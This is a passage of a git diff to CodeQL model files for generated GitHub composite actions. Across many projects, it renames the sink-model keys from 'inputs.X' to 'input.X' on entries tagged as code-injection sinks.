a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["amazon-ion/ion-java", "*", "inputs.project_version", "code-injection", "generated"] - - ["amazon-ion/ion-java", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] + - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index 8b62fe8e0aa..95b5ba13ad1 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/grype", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file + - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 946faca35c9..7157e1bea48 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/syft", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file + - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index b68c9462c1b..a3f43d524b4 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["angular/dev-infra", "*", "inputs.firebase-public-dir", "code-injection", "generated"] - - ["angular/dev-infra", "*", "inputs.workflow-artifact-name", "code-injection", "generated"] - - ["angular/dev-infra", "*", "inputs.artifact-build-revision", "code-injection", "generated"] - - ["angular/dev-infra", "*", "inputs.pull-number", "code-injection", "generated"] - - ["angular/dev-infra", "*", "inputs.deploy-directory", "code-injection", "generated"] \ No newline at end of file + - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.artifact-build-revision", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.pull-number", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.deploy-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index aedefc9ee02..6e0d980943a 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ansible/ansible-lint", "*", "inputs.args", "code-injection", "generated"] - - ["ansible/ansible-lint", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file + - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] + - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index 36f7a18e198..ef682ff4fff 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ansible/awx", "*", "inputs.log-filename", "code-injection", "generated"] - - ["ansible/awx", "*", "inputs.github-token", "code-injection", "generated"] \ No newline at end of file + - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] + - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index a1d324f44bd..7ce84599d17 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/arrow-datafusion", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file + - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index 53142801fec..47f1c83016f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/arrow-rs", "*", "inputs.target", "code-injection", "generated"] - - ["apache/arrow-rs", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file + - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] + - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 5170beb3a7a..54353368db2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/arrow", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file + - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index 1fabdd9085b..119115c1560 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/bookkeeper", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file + - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 370d3c6954e..762623ed27e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/brpc", "*", "inputs.options", "code-injection", "generated"] \ No newline at end of file + - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index ac0156b719f..2272d7ff8e6 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/camel-k", "*", "inputs.test-suite", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-version", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-registry-insecure", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-name", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-registry-host", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.catalog-source-namespace", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.catalog-source-name", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-namespace", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.version", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.otlp-collector-image-version", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.otlp-collector-image-name", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.global-operator-namespace", "code-injection", "generated"] \ No newline at end of file + - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-registry-insecure", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-registry-host", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.catalog-source-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.catalog-source-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.otlp-collector-image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.otlp-collector-image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.global-operator-namespace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index 9ee197ed884..3537169892a 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/camel", "*", "inputs.end-commit", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.start-commit", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.distribution", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.version", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.pr-id", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file + - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] + - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"] + - ["apache/camel", "*", "input.distribution", "code-injection", "generated"] + - ["apache/camel", "*", "input.version", "code-injection", "generated"] + - ["apache/camel", "*", "input.pr-id", "code-injection", "generated"] + - ["apache/camel", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index 99a1e4cec71..dfac696dddf 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/flink", "*", "inputs.maven-parameters", "code-injection", "generated"] - - ["apache/flink", "*", "inputs.env", "code-injection", "generated"] - - ["apache/flink", "*", "inputs.target_directory", "code-injection", "generated"] - - ["apache/flink", "*", "inputs.source_directory", "code-injection", "generated"] - - ["apache/flink", "*", "inputs.jdk_version", "code-injection", "generated"] \ No newline at end of file + - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] + - ["apache/flink", "*", "input.env", "code-injection", "generated"] + - ["apache/flink", "*", "input.target_directory", "code-injection", "generated"] + - ["apache/flink", "*", "input.source_directory", "code-injection", "generated"] + - ["apache/flink", "*", "input.jdk_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index d2a6dbd4929..5c82922c35e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/nuttx", "*", "inputs.haskell", "code-injection", "generated"] - - ["apache/nuttx", "*", "inputs.dotnet", "code-injection", "generated"] - - ["apache/nuttx", "*", "inputs.android", "code-injection", "generated"] \ No newline at end of file + - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] + - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"] + - ["apache/nuttx", "*", "input.android", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index 13a9ff475b9..d618f7b761f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/opendal", "*", "inputs.feature", "code-injection", "generated"] - - ["apache/opendal", "*", "inputs.setup", "code-injection", "generated"] - - ["apache/opendal", "*", "inputs.service", "code-injection", "generated"] - - ["apache/opendal", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] + - ["apache/opendal", "*", "input.setup", "code-injection", "generated"] + - ["apache/opendal", "*", "input.service", "code-injection", "generated"] + - ["apache/opendal", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index a173154bec0..c49315d791a 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/pekko", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file + - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index f7a5017d2fb..f58fcf336fc 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-users", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-actor", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.secure-access", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.action", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.yamale_version", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.yamllint_version", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.secure-access", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.action", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.yamale_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.yamllint_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 1bcf118810f..4812eaa5b4a 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/superset", "*", "inputs.requirements-type", "code-injection", "generated"] \ No newline at end of file + - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index fb210d5af55..de8c3e1b725 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["appflowy-io/appflowy", "*", "inputs.test_path", "code-injection", "generated"] - - ["appflowy-io/appflowy", "*", "inputs.flutter_profile", "code-injection", "generated"] \ No newline at end of file + - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] + - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index 77554b9872e..dee268884a1 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aptos-labs/aptos-core", "*", "inputs.GIT_CREDENTIALS", "code-injection", "generated"] - - ["aptos-labs/aptos-core", "*", "inputs.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] - - ["aptos-labs/aptos-core", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file + - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "input.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 7fc1eaaca48..5e0e5158390 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["archivesspace/archivesspace", "*", "inputs.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file + - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index 921095f8a38..bb4b41a0592 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["armadaproject/armada", "*", "inputs.tox-env", "code-injection", "generated"] \ No newline at end of file + - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index e8dba39c742..ef3a84762db 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["armbian/build", "*", "inputs.armbian_pgp_password", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_extensions", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_release", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_kernel_branch", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_board", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_target", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_branch", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_ui", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_version", "code-injection", "generated"] \ No newline at end of file + - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_release", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_kernel_branch", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_board", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_target", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_branch", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_ui", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 69970d3419b..425242bf220 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["auth0/auth0-java", "*", "inputs.signing-password", "code-injection", "generated"] - - ["auth0/auth0-java", "*", "inputs.signing-key", "code-injection", "generated"] - - ["auth0/auth0-java", "*", "inputs.ossr-password", "code-injection", "generated"] - - ["auth0/auth0-java", "*", "inputs.ossr-username", "code-injection", "generated"] \ No newline at end of file + - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.ossr-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.ossr-username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index b57797cc643..62f1ed005ed 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["auth0/auth0.net", "*", "inputs.nuget-token", "code-injection", "generated"] - - ["auth0/auth0.net", "*", "inputs.nuget-directory", "code-injection", "generated"] - - ["auth0/auth0.net", "*", "inputs.project-paths", "code-injection", "generated"] \ No newline at end of file + - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "input.project-paths", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 08b65cea6d7..098b460bbd8 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["auth0/auth0.swift", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index 453e60f3595..d5a257be220 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["autogluon/autogluon", "*", "inputs.submodule-to-test", "code-injection", "generated"] - - ["autogluon/autogluon", "*", "inputs.command", "code-injection", "generated"] - - ["autogluon/autogluon", "*", "inputs.work-dir", "code-injection", "generated"] - - ["autogluon/autogluon", "*", "inputs.job-name", "code-injection", "generated"] - - ["autogluon/autogluon", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file + - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.command", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.work-dir", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.job-name", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 012802b8006..53c6258551f 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["avaiga/taipy", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file + - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index a397a77f6dc..62a4f2bbcd7 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aws-amplify/amplify-cli", "*", "inputs.cli-version", "code-injection", "generated"] \ No newline at end of file + - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index 15de610c981..ac72bb9ebf0 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aws/amazon-vpc-cni-k8s", "*", "inputs.go-package", "code-injection", "generated"] - - ["aws/amazon-vpc-cni-k8s", "*", "inputs.work-dir", "code-injection", "generated"] \ No newline at end of file + - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] + - ["aws/amazon-vpc-cni-k8s", "*", "input.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index ad6e7e806cd..b3f1ca67eef 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aws/karpenter-provider-aws", "*", "inputs.account_id", "code-injection", "generated"] - - ["aws/karpenter-provider-aws", "*", "inputs.cluster_name", "code-injection", "generated"] \ No newline at end of file + - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] + - ["aws/karpenter-provider-aws", "*", "input.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 67631102d71..44f5ad66096 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["awslabs/amazon-eks-ami", "*", "inputs.max_resource_age_duration", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.aws_region", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.ami_id", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.k8s_version", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.os_distro", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.additional_arguments", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.build_id", "code-injection", "generated"] \ No newline at end of file + - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.aws_region", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.ami_id", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.k8s_version", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.os_distro", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.additional_arguments", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.build_id", "code-injection", "generated"] \ No newline at end of file diff --git 